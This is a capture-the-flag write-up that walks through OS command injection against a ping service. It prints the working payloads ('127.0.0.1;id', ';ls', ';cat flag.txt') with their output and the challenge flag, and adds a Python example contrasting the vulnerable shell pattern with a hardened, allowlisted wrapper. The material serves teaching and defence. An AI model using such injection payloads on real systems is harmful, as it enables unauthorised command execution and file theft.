CyLab - ping-cmd
Challenge
Information
ping-cmd is an easy-difficulty challenge in the General Skills category of the CyLab platform, created by the user Yahaya Meddy.
Description
Can you make the server reveal its secrets? It seems to be able to ping Google DNS, but what happens if you get a little creative with your input?
Hints
Hint 1
The program uses a shell command behind the scenes.
Hint 2
Sometimes, you can run more than one command at a time.

Solution
Connect
I open a connection to the remote service with nc on the host and port provided: mysterious-sea.picoctf.net, port 52164.
root@kali:~ ❯ nc mysterious-sea.picoctf.net 52164
Enter an IP address to ping! (We have tight security because we only allow '8.8.8.8'):
Check
On connecting, the service prompts for an IP address to ping, and the banner claims that only 8.8.8.8 is allowed. As a first test I ping the box itself via localhost (127.0.0.1). The ping output comes back, which shows two things: the input is handed to the ping binary and its output is returned to us, and the advertised restriction to 8.8.8.8 is not actually enforced.
root@kali:~ ❯ nc mysterious-sea.picoctf.net 52164
Enter an IP address to ping! (We have tight security because we only allow '8.8.8.8'): 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.032 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.036 ms
--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1025ms
rtt min/avg/max/mdev = 0.032/0.034/0.036/0.002 ms
Command Injection
A very common vulnerability in programs that do not properly sanitize their input is operating-system command injection: when user input is interpolated into a string that a shell interprets, metacharacters such as ;, &&, || and | let the user append commands of their own. Here I try the usual chaining operators and succeed in injecting the id command with the ; separator; the injected command runs with the privileges of the service itself, the ctf-player user.
root@kali:~ ❯ nc mysterious-sea.picoctf.net 52164
Enter an IP address to ping! (We have tight security because we only allow '8.8.8.8'): 127.0.0.1;id
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.028 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.035 ms
--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1028ms
rtt min/avg/max/mdev = 0.028/0.031/0.035/0.003 ms
uid=1000(ctf-player) gid=1000(ctf-player) groups=1000(ctf-player)
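The following Python is an added example, not the challenge's own code (the contents of script.sh are never shown on this page). It reproduces the vulnerable pattern behind a ping wrapper of this kind, tokenises the resulting command line the way /bin/sh would so the effect of the ; separator is visible, and sets it beside a hardened wrapper that validates the input as a literal IP address against an allowlist and passes an argv list instead of a shell string. The allowlist constant (taken from the banner's "we only allow 8.8.8.8") and all function names are my own assumptions.

```python
"""Added example, not code from the challenge or its script.sh.

Shows why "127.0.0.1;id" works against a ping wrapper that builds a shell
string, and how a hardened wrapper rejects it.  Everything here runs
offline: the vulnerable path returns the string the shell would receive
instead of executing it.
"""
import ipaddress
import shlex
import subprocess

# Assumed allowlist, taken from the challenge banner ("we only allow 8.8.8.8").
ALLOWED_TARGETS = {"8.8.8.8"}


def vulnerable_command(user_input: str) -> str:
    """Vulnerable pattern: user input interpolated into a shell command line.

    A real service would then call os.system(cmd) or
    subprocess.run(cmd, shell=True); the string is returned here so the
    example runs without touching the network.
    """
    return f"ping -c 2 {user_input}"


def shell_commands(shell_string: str) -> list[list[str]]:
    """Tokenise the line as /bin/sh would and split it at ';'.

    Returns one argv list per command the shell would run.  Only ';' is
    handled; '&&', '||', '|', backticks and $( ) are further separators
    the real shell honours.
    """
    lexer = shlex.shlex(shell_string, posix=True, punctuation_chars=True)
    commands: list[list[str]] = []
    current: list[str] = []
    for token in lexer:
        if token == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def hardened_argv(user_input: str) -> list[str]:
    """Hardened version: validate, then build an argv list, never a shell line.

    ipaddress.ip_address() accepts only a literal IPv4/IPv6 address, so
    separators (;), option injection (-f) and hostnames are all rejected
    before anything reaches ping.  The allowlist then enforces the policy
    the banner claims.  Raises ValueError on any rejected input.
    """
    candidate = user_input.strip()
    try:
        addr = ipaddress.ip_address(candidate)
    except ValueError:
        raise ValueError(f"not an IP address literal: {candidate!r}") from None
    if str(addr) not in ALLOWED_TARGETS:
        raise ValueError(f"target not in allowlist: {addr}")
    return ["ping", "-c", "2", str(addr)]


def accepts(user_input: str) -> bool:
    """True if the hardened wrapper would ping this input."""
    try:
        hardened_argv(user_input)
    except ValueError:
        return False
    return True


def run_hardened(user_input: str) -> str:
    """Run ping with the validated argv (no shell involved).

    Needs network access, so the offline checks never call it.
    """
    argv = hardened_argv(user_input)
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    payload = "127.0.0.1;id"
    print("shell would run:", shell_commands(vulnerable_command(payload)))
    print("hardened accepts payload:", accepts(payload))
    print("hardened accepts 8.8.8.8:", accepts("8.8.8.8"))
```

The point of the hardened path is that validation and execution are both fixed: parsing the input as an IP address literal removes every shell metacharacter and every leading dash, and passing an argv list means that even if a bad value slipped through there is no shell to interpret it. Note that the hardened version also rejects 127.0.0.1, which the real service accepted despite its banner.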
I use ls to list the files in the current directory and see that the flag (flag.txt) is there, alongside a script.sh.
root@kali:~ ❯ nc mysterious-sea.picoctf.net 52164
Enter an IP address to ping! (We have tight security because we only allow '8.8.8.8'): 127.0.0.1;ls
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.030 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.032 ms
--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1028ms
rtt min/avg/max/mdev = 0.030/0.031/0.032/0.001 ms
flag.txt
script.sh
Flag
I read the flag (flag.txt) from the current directory with the same separator.
root@kali:~ ❯ nc mysterious-sea.picoctf.net 52164
Enter an IP address to ping! (We have tight security because we only allow '8.8.8.8'): 127.0.0.1;cat flag.txt
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.030 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.032 ms
--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1028ms
rtt min/avg/max/mdev = 0.030/0.031/0.032/0.001 ms
picoCTF{p1nG_c0mm@nd_3xpL0it_su33essFuL_ddce97d3}
That concludes the write-up of the ping-cmd challenge from CyLab.
Happy Hacking! 🙂